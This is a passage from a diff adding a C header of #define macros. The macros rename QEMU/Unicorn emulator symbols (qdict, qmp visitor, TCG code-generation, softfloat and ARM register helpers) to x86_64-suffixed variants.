open_modeflags open_modeflags_x86_64 +#define op_to_mov op_to_mov_x86_64 +#define op_to_movi op_to_movi_x86_64 +#define output_type_enum output_type_enum_x86_64 +#define packFloat128 packFloat128_x86_64 +#define packFloat16 packFloat16_x86_64 +#define packFloat32 packFloat32_x86_64 +#define packFloat64 packFloat64_x86_64 +#define packFloatx80 packFloatx80_x86_64 +#define page_find page_find_x86_64 +#define page_find_alloc page_find_alloc_x86_64 +#define page_flush_tb page_flush_tb_x86_64 +#define page_flush_tb_1 page_flush_tb_1_x86_64 +#define page_init page_init_x86_64 +#define page_size_init page_size_init_x86_64 +#define par par_x86_64 +#define parse_array parse_array_x86_64 +#define parse_error parse_error_x86_64 +#define parse_escape parse_escape_x86_64 +#define parse_keyword parse_keyword_x86_64 +#define parse_literal parse_literal_x86_64 +#define parse_object parse_object_x86_64 +#define parse_optional parse_optional_x86_64 +#define parse_option_bool parse_option_bool_x86_64 +#define parse_option_number parse_option_number_x86_64 +#define parse_option_size parse_option_size_x86_64 +#define parse_pair parse_pair_x86_64 +#define parser_context_free parser_context_free_x86_64 +#define parser_context_new parser_context_new_x86_64 +#define parser_context_peek_token parser_context_peek_token_x86_64 +#define parser_context_pop_token parser_context_pop_token_x86_64 +#define parser_context_restore parser_context_restore_x86_64 +#define parser_context_save parser_context_save_x86_64 +#define parse_str parse_str_x86_64 +#define parse_type_bool parse_type_bool_x86_64 +#define parse_type_int parse_type_int_x86_64 +#define parse_type_number parse_type_number_x86_64 +#define parse_type_size parse_type_size_x86_64 +#define parse_type_str parse_type_str_x86_64 +#define parse_value parse_value_x86_64 +#define par_write par_write_x86_64 +#define patch_reloc patch_reloc_x86_64 +#define phys_map_node_alloc phys_map_node_alloc_x86_64 +#define phys_map_node_reserve phys_map_node_reserve_x86_64 +#define phys_mem_alloc phys_mem_alloc_x86_64 +#define phys_mem_set_alloc phys_mem_set_alloc_x86_64 +#define phys_page_compact phys_page_compact_x86_64 +#define phys_page_compact_all phys_page_compact_all_x86_64 +#define phys_page_find phys_page_find_x86_64 +#define phys_page_set phys_page_set_x86_64 +#define phys_page_set_level phys_page_set_level_x86_64 +#define phys_section_add phys_section_add_x86_64 +#define phys_section_destroy phys_section_destroy_x86_64 +#define phys_sections_free phys_sections_free_x86_64 +#define pickNaN pickNaN_x86_64 +#define pickNaNMulAdd pickNaNMulAdd_x86_64 +#define pmccfiltr_write pmccfiltr_write_x86_64 +#define pmccntr_read pmccntr_read_x86_64 +#define pmccntr_sync pmccntr_sync_x86_64 +#define pmccntr_write pmccntr_write_x86_64 +#define pmccntr_write32 pmccntr_write32_x86_64 +#define pmcntenclr_write pmcntenclr_write_x86_64 +#define pmcntenset_write pmcntenset_write_x86_64 +#define pmcr_write pmcr_write_x86_64 +#define pmintenclr_write pmintenclr_write_x86_64 +#define pmintenset_write pmintenset_write_x86_64 +#define pmovsr_write pmovsr_write_x86_64 +#define pmreg_access pmreg_access_x86_64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_x86_64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_x86_64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_x86_64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_x86_64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_x86_64 +#define pmuserenr_write pmuserenr_write_x86_64 +#define pmxevtyper_write pmxevtyper_write_x86_64 +#define print_type_bool print_type_bool_x86_64 +#define print_type_int print_type_int_x86_64 +#define print_type_number print_type_number_x86_64 +#define print_type_size print_type_size_x86_64 +#define print_type_str print_type_str_x86_64 +#define propagateFloat128NaN propagateFloat128NaN_x86_64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_x86_64 +#define propagateFloat32NaN propagateFloat32NaN_x86_64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_x86_64 +#define propagateFloat64NaN propagateFloat64NaN_x86_64 +#define propagateFloatx80NaN propagateFloatx80NaN_x86_64 +#define property_get_alias property_get_alias_x86_64 +#define property_get_bool property_get_bool_x86_64 +#define property_get_str property_get_str_x86_64 +#define property_get_uint16_ptr property_get_uint16_ptr_x86_64 +#define property_get_uint32_ptr property_get_uint32_ptr_x86_64 +#define property_get_uint64_ptr property_get_uint64_ptr_x86_64 +#define property_get_uint8_ptr property_get_uint8_ptr_x86_64 +#define property_release_alias property_release_alias_x86_64 +#define property_release_bool property_release_bool_x86_64 +#define property_release_str property_release_str_x86_64 +#define property_resolve_alias property_resolve_alias_x86_64 +#define property_set_alias property_set_alias_x86_64 +#define property_set_bool property_set_bool_x86_64 +#define property_set_str property_set_str_x86_64 +#define pstate_read pstate_read_x86_64 +#define pstate_write pstate_write_x86_64 +#define pxa250_initfn pxa250_initfn_x86_64 +#define pxa255_initfn pxa255_initfn_x86_64 +#define pxa260_initfn pxa260_initfn_x86_64 +#define pxa261_initfn pxa261_initfn_x86_64 +#define pxa262_initfn pxa262_initfn_x86_64 +#define pxa270a0_initfn pxa270a0_initfn_x86_64 +#define pxa270a1_initfn pxa270a1_initfn_x86_64 +#define pxa270b0_initfn pxa270b0_initfn_x86_64 +#define pxa270b1_initfn pxa270b1_initfn_x86_64 +#define pxa270c0_initfn pxa270c0_initfn_x86_64 +#define pxa270c5_initfn pxa270c5_initfn_x86_64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_x86_64 +#define qapi_dealloc_end_list qapi_dealloc_end_list_x86_64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_x86_64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_x86_64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_x86_64 +#define qapi_dealloc_pop qapi_dealloc_pop_x86_64 +#define qapi_dealloc_push qapi_dealloc_push_x86_64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_x86_64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_x86_64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_x86_64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_x86_64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_x86_64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_x86_64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_x86_64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_x86_64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_x86_64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_x86_64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_x86_64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_x86_64 +#define qapi_free_boolList qapi_free_boolList_x86_64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_x86_64 +#define qapi_free_int16List qapi_free_int16List_x86_64 +#define qapi_free_int32List qapi_free_int32List_x86_64 +#define qapi_free_int64List qapi_free_int64List_x86_64 +#define qapi_free_int8List qapi_free_int8List_x86_64 +#define qapi_free_intList qapi_free_intList_x86_64 +#define qapi_free_numberList qapi_free_numberList_x86_64 +#define qapi_free_strList qapi_free_strList_x86_64 +#define qapi_free_uint16List qapi_free_uint16List_x86_64 +#define qapi_free_uint32List qapi_free_uint32List_x86_64 +#define qapi_free_uint64List qapi_free_uint64List_x86_64 +#define qapi_free_uint8List qapi_free_uint8List_x86_64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_x86_64 +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_x86_64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_x86_64 +#define qbool_destroy_obj qbool_destroy_obj_x86_64 +#define qbool_from_int qbool_from_int_x86_64 +#define qbool_get_int qbool_get_int_x86_64 +#define qbool_type qbool_type_x86_64 +#define qbus_create qbus_create_x86_64 +#define qbus_create_inplace qbus_create_inplace_x86_64 +#define qbus_finalize qbus_finalize_x86_64 +#define qbus_initfn qbus_initfn_x86_64 +#define qbus_realize qbus_realize_x86_64 +#define qdev_create qdev_create_x86_64 +#define qdev_get_type qdev_get_type_x86_64 +#define qdev_register_types qdev_register_types_x86_64 +#define qdev_set_parent_bus qdev_set_parent_bus_x86_64 +#define qdev_try_create qdev_try_create_x86_64 +#define qdict_add_key qdict_add_key_x86_64 +#define qdict_array_split qdict_array_split_x86_64 +#define qdict_clone_shallow qdict_clone_shallow_x86_64 +#define qdict_del qdict_del_x86_64 +#define qdict_destroy_obj qdict_destroy_obj_x86_64 +#define qdict_entry_key qdict_entry_key_x86_64 +#define qdict_entry_value qdict_entry_value_x86_64 +#define qdict_extract_subqdict qdict_extract_subqdict_x86_64 +#define qdict_find qdict_find_x86_64 +#define qdict_first qdict_first_x86_64 +#define qdict_flatten qdict_flatten_x86_64 +#define qdict_flatten_qdict qdict_flatten_qdict_x86_64 +#define qdict_flatten_qlist qdict_flatten_qlist_x86_64 +#define qdict_get qdict_get_x86_64 +#define qdict_get_bool qdict_get_bool_x86_64 +#define qdict_get_double qdict_get_double_x86_64 +#define qdict_get_int qdict_get_int_x86_64 +#define qdict_get_obj qdict_get_obj_x86_64 +#define qdict_get_qdict qdict_get_qdict_x86_64 +#define qdict_get_qlist qdict_get_qlist_x86_64 +#define qdict_get_str qdict_get_str_x86_64 +#define qdict_get_try_bool qdict_get_try_bool_x86_64 +#define qdict_get_try_int qdict_get_try_int_x86_64 +#define qdict_get_try_str qdict_get_try_str_x86_64 +#define qdict_haskey qdict_haskey_x86_64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_x86_64 +#define qdict_iter qdict_iter_x86_64 +#define qdict_join qdict_join_x86_64 +#define qdict_new qdict_new_x86_64 +#define qdict_next qdict_next_x86_64 +#define qdict_next_entry qdict_next_entry_x86_64 +#define qdict_put_obj qdict_put_obj_x86_64 +#define qdict_size qdict_size_x86_64 +#define qdict_type qdict_type_x86_64 +#define qemu_clock_get_us qemu_clock_get_us_x86_64 +#define qemu_clock_ptr qemu_clock_ptr_x86_64 +#define qemu_clocks qemu_clocks_x86_64 +#define qemu_get_cpu qemu_get_cpu_x86_64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_x86_64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_x86_64 +#define qemu_get_ram_block qemu_get_ram_block_x86_64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_x86_64 +#define qemu_get_ram_fd qemu_get_ram_fd_x86_64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_x86_64 +#define qemu_host_page_mask qemu_host_page_mask_x86_64 +#define qemu_host_page_size qemu_host_page_size_x86_64 +#define qemu_init_vcpu qemu_init_vcpu_x86_64 +#define qemu_ld_helpers qemu_ld_helpers_x86_64 +#define qemu_log_close qemu_log_close_x86_64 +#define qemu_log_enabled qemu_log_enabled_x86_64 +#define qemu_log_flush qemu_log_flush_x86_64 +#define qemu_loglevel_mask qemu_loglevel_mask_x86_64 +#define qemu_log_vprintf qemu_log_vprintf_x86_64 +#define qemu_oom_check qemu_oom_check_x86_64 +#define qemu_parse_fd qemu_parse_fd_x86_64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_x86_64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_x86_64 +#define qemu_ram_alloc qemu_ram_alloc_x86_64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_x86_64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_x86_64 +#define qemu_ram_free qemu_ram_free_x86_64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_x86_64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_x86_64 +#define qemu_ram_remap qemu_ram_remap_x86_64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_x86_64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_x86_64 +#define qemu_real_host_page_size qemu_real_host_page_size_x86_64 +#define qemu_st_helpers qemu_st_helpers_x86_64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_x86_64 +#define qemu_try_memalign qemu_try_memalign_x86_64 +#define qentry_destroy qentry_destroy_x86_64 +#define qerror_human qerror_human_x86_64 +#define qerror_report qerror_report_x86_64 +#define qerror_report_err qerror_report_err_x86_64 +#define qfloat_destroy_obj qfloat_destroy_obj_x86_64 +#define qfloat_from_double qfloat_from_double_x86_64 +#define qfloat_get_double qfloat_get_double_x86_64 +#define qfloat_type qfloat_type_x86_64 +#define qint_destroy_obj qint_destroy_obj_x86_64 +#define qint_from_int qint_from_int_x86_64 +#define qint_get_int qint_get_int_x86_64 +#define qint_type qint_type_x86_64 +#define qlist_append_obj qlist_append_obj_x86_64 +#define qlist_copy qlist_copy_x86_64 +#define qlist_copy_elem qlist_copy_elem_x86_64 +#define qlist_destroy_obj qlist_destroy_obj_x86_64 +#define qlist_empty qlist_empty_x86_64 +#define qlist_entry_obj qlist_entry_obj_x86_64 +#define qlist_first qlist_first_x86_64 +#define qlist_iter qlist_iter_x86_64 +#define qlist_new qlist_new_x86_64 +#define qlist_next qlist_next_x86_64 +#define qlist_peek qlist_peek_x86_64 +#define qlist_pop qlist_pop_x86_64 +#define qlist_size qlist_size_x86_64 +#define qlist_size_iter qlist_size_iter_x86_64 +#define qlist_type qlist_type_x86_64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_x86_64 +#define qmp_input_end_list qmp_input_end_list_x86_64 +#define qmp_input_end_struct qmp_input_end_struct_x86_64 +#define qmp_input_get_next_type qmp_input_get_next_type_x86_64 +#define qmp_input_get_object qmp_input_get_object_x86_64 +#define qmp_input_get_visitor qmp_input_get_visitor_x86_64 +#define qmp_input_next_list qmp_input_next_list_x86_64 +#define qmp_input_optional qmp_input_optional_x86_64 +#define qmp_input_pop qmp_input_pop_x86_64 +#define qmp_input_push qmp_input_push_x86_64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_x86_64 +#define qmp_input_start_list qmp_input_start_list_x86_64 +#define qmp_input_start_struct qmp_input_start_struct_x86_64 +#define qmp_input_type_bool qmp_input_type_bool_x86_64 +#define qmp_input_type_int qmp_input_type_int_x86_64 +#define qmp_input_type_number qmp_input_type_number_x86_64 +#define qmp_input_type_str qmp_input_type_str_x86_64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_x86_64 +#define qmp_input_visitor_new qmp_input_visitor_new_x86_64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_x86_64 +#define qmp_output_add_obj qmp_output_add_obj_x86_64 +#define qmp_output_end_list qmp_output_end_list_x86_64 +#define qmp_output_end_struct qmp_output_end_struct_x86_64 +#define qmp_output_first qmp_output_first_x86_64 +#define qmp_output_get_qobject qmp_output_get_qobject_x86_64 +#define qmp_output_get_visitor qmp_output_get_visitor_x86_64 +#define qmp_output_last qmp_output_last_x86_64 +#define qmp_output_next_list qmp_output_next_list_x86_64 +#define qmp_output_pop qmp_output_pop_x86_64 +#define qmp_output_push_obj qmp_output_push_obj_x86_64 +#define qmp_output_start_list qmp_output_start_list_x86_64 +#define qmp_output_start_struct qmp_output_start_struct_x86_64 +#define qmp_output_type_bool qmp_output_type_bool_x86_64 +#define qmp_output_type_int qmp_output_type_int_x86_64 +#define qmp_output_type_number qmp_output_type_number_x86_64 +#define qmp_output_type_str qmp_output_type_str_x86_64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_x86_64 +#define qmp_output_visitor_new qmp_output_visitor_new_x86_64 +#define qobject_decref qobject_decref_x86_64 +#define qobject_to_qbool qobject_to_qbool_x86_64 +#define qobject_to_qdict qobject_to_qdict_x86_64 +#define qobject_to_qfloat qobject_to_qfloat_x86_64 +#define qobject_to_qint qobject_to_qint_x86_64 +#define qobject_to_qlist qobject_to_qlist_x86_64 +#define qobject_to_qstring qobject_to_qstring_x86_64 +#define qobject_type qobject_type_x86_64 +#define qstring_append qstring_append_x86_64 +#define qstring_append_chr qstring_append_chr_x86_64 +#define qstring_append_int qstring_append_int_x86_64 +#define qstring_destroy_obj qstring_destroy_obj_x86_64 +#define qstring_from_escaped_str qstring_from_escaped_str_x86_64 +#define qstring_from_str qstring_from_str_x86_64 +#define qstring_from_substr qstring_from_substr_x86_64 +#define qstring_get_length qstring_get_length_x86_64 +#define qstring_get_str qstring_get_str_x86_64 +#define qstring_new qstring_new_x86_64 +#define qstring_type qstring_type_x86_64 +#define ram_block_add ram_block_add_x86_64 +#define ram_size ram_size_x86_64 +#define range_compare range_compare_x86_64 +#define range_covers_byte range_covers_byte_x86_64 +#define range_get_last range_get_last_x86_64 +#define range_merge range_merge_x86_64 +#define ranges_can_merge ranges_can_merge_x86_64 +#define raw_read raw_read_x86_64 +#define raw_write raw_write_x86_64 +#define rcon rcon_x86_64 +#define read_raw_cp_reg read_raw_cp_reg_x86_64 +#define recip_estimate recip_estimate_x86_64 +#define recip_sqrt_estimate recip_sqrt_estimate_x86_64 +#define register_cp_regs_for_features register_cp_regs_for_features_x86_64 +#define register_multipage register_multipage_x86_64 +#define register_subpage register_subpage_x86_64 +#define register_tm_clones register_tm_clones_x86_64 +#define register_types_object register_types_object_x86_64 +#define regnames regnames_x86_64 +#define render_memory_region render_memory_region_x86_64 +#define reset_all_temps reset_all_temps_x86_64 +#define reset_temp reset_temp_x86_64 +#define rol32 rol32_x86_64 +#define rol64 rol64_x86_64 +#define ror32 ror32_x86_64 +#define ror64 ror64_x86_64 +#define roundAndPackFloat128 roundAndPackFloat128_x86_64 +#define roundAndPackFloat16 roundAndPackFloat16_x86_64 +#define roundAndPackFloat32 roundAndPackFloat32_x86_64 +#define roundAndPackFloat64 roundAndPackFloat64_x86_64 +#define roundAndPackFloatx80 roundAndPackFloatx80_x86_64 +#define roundAndPackInt32 roundAndPackInt32_x86_64 +#define roundAndPackInt64 roundAndPackInt64_x86_64 +#define roundAndPackUint64 roundAndPackUint64_x86_64 +#define round_to_inf round_to_inf_x86_64 +#define run_on_cpu run_on_cpu_x86_64 +#define s0 s0_x86_64 +#define S0 S0_x86_64 +#define s1 s1_x86_64 +#define S1 S1_x86_64 +#define sa1100_initfn sa1100_initfn_x86_64 +#define sa1110_initfn sa1110_initfn_x86_64 +#define save_globals save_globals_x86_64 +#define scr_write scr_write_x86_64 +#define sctlr_write sctlr_write_x86_64 +#define set_bit set_bit_x86_64 +#define set_bits set_bits_x86_64 +#define set_default_nan_mode set_default_nan_mode_x86_64 +#define set_feature set_feature_x86_64 +#define set_float_detect_tininess set_float_detect_tininess_x86_64 +#define set_float_exception_flags set_float_exception_flags_x86_64 +#define set_float_rounding_mode set_float_rounding_mode_x86_64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_x86_64 +#define set_flush_to_zero set_flush_to_zero_x86_64 +#define set_swi_errno set_swi_errno_x86_64 +#define sextract32 sextract32_x86_64 +#define sextract64 sextract64_x86_64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_x86_64 +#define shift128Right shift128Right_x86_64 +#define shift128RightJamming shift128RightJamming_x86_64 +#define shift32RightJamming shift32RightJamming_x86_64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_x86_64 +#define shift64RightJamming shift64RightJamming_x86_64 +#define shifter_out_im shifter_out_im_x86_64 +#define shortShift128Left shortShift128Left_x86_64 +#define shortShift192Left shortShift192Left_x86_64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_x86_64 +#define size_code_gen_buffer size_code_gen_buffer_x86_64 +#define softmmu_lock_user softmmu_lock_user_x86_64 +#define softmmu_lock_user_string softmmu_lock_user_string_x86_64 +#define softmmu_tget32 softmmu_tget32_x86_64 +#define softmmu_tget8 softmmu_tget8_x86_64 +#define softmmu_tput32 softmmu_tput32_x86_64 +#define softmmu_unlock_user softmmu_unlock_user_x86_64 +#define sort_constraints sort_constraints_x86_64 +#define sp_el0_access sp_el0_access_x86_64 +#define spsel_read spsel_read_x86_64 +#define spsel_write spsel_write_x86_64 +#define start_list start_list_x86_64 +#define stb_p stb_p_x86_64 +#define stb_phys stb_phys_x86_64 +#define stl_be_p stl_be_p_x86_64 +#define stl_be_phys stl_be_phys_x86_64 +#define stl_he_p stl_he_p_x86_64 +#define stl_le_p stl_le_p_x86_64 +#define stl_le_phys stl_le_phys_x86_64 +#define stl_phys stl_phys_x86_64 +#define stl_phys_internal stl_phys_internal_x86_64 +#define stl_phys_notdirty stl_phys_notdirty_x86_64 +#define store_cpu_offset store_cpu_offset_x86_64 +#define store_reg store_reg_x86_64 +#define store_reg_bx store_reg_bx_x86_64 +#define store_reg_from_load store_reg_from_load_x86_64 +#define stq_be_p stq_be_p_x86_64 +#define stq_be_phys stq_be_phys_x86_64 +#define stq_he_p stq_he_p_x86_64 +#define stq_le_p stq_le_p_x86_64 +#define stq_le_phys stq_le_phys_x86_64 +#define stq_phys stq_phys_x86_64 +#define string_input_get_visitor string_input_get_visitor_x86_64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_x86_64 +#define string_input_visitor_new string_input_visitor_new_x86_64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_x86_64 +#define strstart strstart_x86_64 +#define strtosz strtosz_x86_64 +#define strtosz_suffix strtosz_suffix_x86_64 +#define stw_be_p stw_be_p_x86_64 +#define stw_be_phys stw_be_phys_x86_64 +#define stw_he_p stw_he_p_x86_64 +#define stw_le_p stw_le_p_x86_64 +#define stw_le_phys stw_le_phys_x86_64 +#define stw_phys stw_phys_x86_64 +#define stw_phys_internal stw_phys_internal_x86_64 +#define sub128 sub128_x86_64 +#define sub16_sat sub16_sat_x86_64 +#define sub16_usat sub16_usat_x86_64 +#define sub192 sub192_x86_64 +#define sub8_sat sub8_sat_x86_64 +#define sub8_usat sub8_usat_x86_64 +#define subFloat128Sigs subFloat128Sigs_x86_64 +#define subFloat32Sigs subFloat32Sigs_x86_64 +#define subFloat64Sigs subFloat64Sigs_x86_64 +#define subFloatx80Sigs subFloatx80Sigs_x86_64 +#define subpage_accepts subpage_accepts_x86_64 +#define subpage_init subpage_init_x86_64 +#define subpage_ops subpage_ops_x86_64 +#define subpage_read subpage_read_x86_64 +#define subpage_register subpage_register_x86_64 +#define subpage_write subpage_write_x86_64 +#define suffix_mul suffix_mul_x86_64 +#define swap_commutative swap_commutative_x86_64 +#define swap_commutative2 swap_commutative2_x86_64 +#define switch_mode switch_mode_x86_64 +#define switch_v7m_sp switch_v7m_sp_x86_64 +#define syn_aa32_bkpt syn_aa32_bkpt_x86_64 +#define syn_aa32_hvc syn_aa32_hvc_x86_64 +#define syn_aa32_smc syn_aa32_smc_x86_64 +#define syn_aa32_svc syn_aa32_svc_x86_64 +#define syn_breakpoint syn_breakpoint_x86_64 +#define sync_globals sync_globals_x86_64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_x86_64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_x86_64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_x86_64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_x86_64 +#define syn_data_abort syn_data_abort_x86_64 +#define syn_fp_access_trap syn_fp_access_trap_x86_64 +#define syn_insn_abort syn_insn_abort_x86_64 +#define syn_swstep syn_swstep_x86_64 +#define syn_uncategorized syn_uncategorized_x86_64 +#define syn_watchpoint syn_watchpoint_x86_64 +#define syscall_err syscall_err_x86_64 +#define system_bus_class_init system_bus_class_init_x86_64 +#define system_bus_info system_bus_info_x86_64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_x86_64 +#define table_logic_cc table_logic_cc_x86_64 +#define target_parse_constraint target_parse_constraint_x86_64 +#define target_words_bigendian target_words_bigendian_x86_64 +#define tb_add_jump tb_add_jump_x86_64 +#define tb_alloc tb_alloc_x86_64 +#define tb_alloc_page tb_alloc_page_x86_64 +#define tb_check_watchpoint tb_check_watchpoint_x86_64 +#define tb_find_fast tb_find_fast_x86_64 +#define tb_find_pc tb_find_pc_x86_64 +#define tb_find_slow tb_find_slow_x86_64 +#define tb_flush tb_flush_x86_64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_x86_64 +#define tb_free tb_free_x86_64 +#define tb_gen_code tb_gen_code_x86_64 +#define tb_hash_remove tb_hash_remove_x86_64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_x86_64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_x86_64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_x86_64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_x86_64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_x86_64 +#define tb_jmp_remove tb_jmp_remove_x86_64 +#define tb_link_page tb_link_page_x86_64 +#define tb_page_remove tb_page_remove_x86_64 +#define tb_phys_hash_func tb_phys_hash_func_x86_64 +#define tb_phys_invalidate tb_phys_invalidate_x86_64 +#define tb_reset_jump tb_reset_jump_x86_64 +#define tb_set_jmp_target tb_set_jmp_target_x86_64 +#define tcg_accel_class_init tcg_accel_class_init_x86_64 +#define tcg_accel_type tcg_accel_type_x86_64 +#define tcg_add_param_i32 tcg_add_param_i32_x86_64 +#define tcg_add_param_i64 tcg_add_param_i64_x86_64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_x86_64 +#define tcg_allowed tcg_allowed_x86_64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_x86_64 +#define tcg_commit tcg_commit_x86_64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_x86_64 +#define tcg_constant_folding tcg_constant_folding_x86_64 +#define tcg_const_i32 tcg_const_i32_x86_64 +#define tcg_const_i64 tcg_const_i64_x86_64 +#define tcg_const_local_i32 tcg_const_local_i32_x86_64 +#define tcg_const_local_i64 tcg_const_local_i64_x86_64 +#define tcg_context_init tcg_context_init_x86_64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_x86_64 +#define tcg_cpu_exec tcg_cpu_exec_x86_64 +#define tcg_current_code_size tcg_current_code_size_x86_64 +#define tcg_dump_info tcg_dump_info_x86_64 +#define tcg_dump_ops tcg_dump_ops_x86_64 +#define tcg_exec_all tcg_exec_all_x86_64 +#define tcg_find_helper tcg_find_helper_x86_64 +#define tcg_func_start tcg_func_start_x86_64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_x86_64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_x86_64 +#define tcg_gen_add_i32 tcg_gen_add_i32_x86_64 +#define tcg_gen_add_i64 tcg_gen_add_i64_x86_64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_x86_64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_x86_64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_x86_64 +#define tcg_gen_and_i32 tcg_gen_and_i32_x86_64 +#define tcg_gen_and_i64 tcg_gen_and_i64_x86_64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_x86_64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_x86_64 +#define tcg_gen_br tcg_gen_br_x86_64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_x86_64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_x86_64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_x86_64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_x86_64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_x86_64 +#define tcg_gen_callN tcg_gen_callN_x86_64 +#define tcg_gen_code tcg_gen_code_x86_64 +#define tcg_gen_code_common tcg_gen_code_common_x86_64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_x86_64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_x86_64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_x86_64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_x86_64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_x86_64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_x86_64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_x86_64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_x86_64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_x86_64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_x86_64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_x86_64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_x86_64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_x86_64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_x86_64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_x86_64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_x86_64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_x86_64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_x86_64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_x86_64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_x86_64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_x86_64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_x86_64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_x86_64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_x86_64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_x86_64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_x86_64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_x86_64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_x86_64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_x86_64 +#define tcg_gen_not_i32 tcg_gen_not_i32_x86_64 +#define tcg_gen_op0 tcg_gen_op0_x86_64 +#define tcg_gen_op1i tcg_gen_op1i_x86_64 +#define 